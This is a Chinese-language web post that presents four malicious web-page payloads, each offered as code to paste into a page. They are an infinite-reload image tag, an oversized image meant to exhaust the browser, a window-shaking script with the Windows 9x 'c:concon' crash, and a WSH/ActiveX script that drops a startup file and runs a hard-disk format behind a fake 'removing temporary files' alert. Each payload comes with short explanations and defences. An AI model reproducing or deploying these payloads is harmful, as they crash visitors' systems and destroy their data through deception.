网站恶意代码公开

A、死循环代码：
『把下列代码加入到网页中，可达到如上效果』
<img src=javascript:location=“网页的文件名.htm:”>

说明：当含有这段代码的网页被人点击，连接就会不断的打开IE浏览器，直到你的系统资源浪费到0％～只有重新启动才能正常使用！

预防方法：禁用所有的ActiveX控件和插件！因为这是一个ActiveX教本程序～

B、恐怖的大图片：
『把下列代码加入到网页中，可达到如上效果』
<img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">

说明：当打开这样的网页，IE会不断的解释试图打开，但由于图片实在太大，超出了其处理能力，所以……

C、地震死机代码：
『把下列代码加入到网页中，可达到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:concon">

说明：<img src="c:concon">是windows9x的设备名称解析漏洞！
WINDOWS9x的concon设备名称解析漏洞允许用户进行攻击，倒是98死机。原理：我们知道，CON是DOS下的特殊设备名，不允许做文件名，如果我们在DOS下键入如下命令：copy coldcrysky.txt con，系统会显示coldcrysky.txt的内容，如果换成：copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN，则输出coldcrysky.txt到打印机。由此可见，CON代表文件本身，如果使用CONCON命令，则意味着系统不断调用文件本身，视系统资源迅速枯竭，连按CTRL+ALT+DEL的机会都没有～
解决办法：
对于9X系统，强烈建议打补丁！！！2000和XP则不会死机～

D、格式化硬盘：（最恐怖的～～～慎用！！！请勿用于非法用途！！！使用后如果有任何负作用，后果自负！与伤寒天空『ColdCrySky』；乱刀留影无关！！！）

scr,Reset();
scr.Path="C:WINDOWSStartMenuPrograms启动startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();

说明：当您浏览了网页，会把startup.hta文件写入启动文件夹，并提示WINDOWS正在删除临时文件！实际上是在格式化你的D盘，代码中的：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为：Windows Scripting Host Shell Object。代码中的：WSH全称是：Windows Scripting Host，是微软的一种基于32位系统平台与语言无关的教本解释机制，它使得脚本能在WINDOWS桌面或命令提示符下运行～WSH所对应的程序WScript.exe是一个脚本语言解释器，位于WINDOWS所在文件夹下，所以它可以像执行批处理文件一样执行WSH脚本程序～
解决方法：1）更新您的浏览器，使用最新的浏览器上网！
2）修改msdos.sys，在其中加入：Bootmentu=0命令行，目的是禁用启动菜单。
3）吧format.com改名
4）禁用WSH。具体方法：在win98中，从添加删除程序中点击WINDOWS安装程序，打开附件一项，将WINDOWS SCRIPTING HOST前面的选项去掉，就可以卸载掉WSH了～～～win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型，找到VBS VBSCRIPT FILE选项，点击删除